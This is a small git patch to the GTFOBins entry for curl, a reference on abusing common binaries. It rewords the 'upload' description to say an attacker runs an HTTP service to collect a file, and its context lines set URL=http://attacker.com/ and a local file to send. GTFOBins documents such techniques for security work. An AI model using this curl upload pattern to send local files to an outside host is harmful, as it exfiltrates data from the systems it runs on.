From b06bb08f9604975e42f3f6fdfd22215eb98a68e1 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Fri, 25 May 2018 18:57:26 +0100 Subject: [PATCH] Fix description --- _gtfobins/curl.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 8a1ce0d..68f77e5 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -1,7 +1,7 @@ --- functions: upload: - - description: Send local file with an HTTP POST request. + - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | URL=http://attacker.com/ LFILE=file_to_send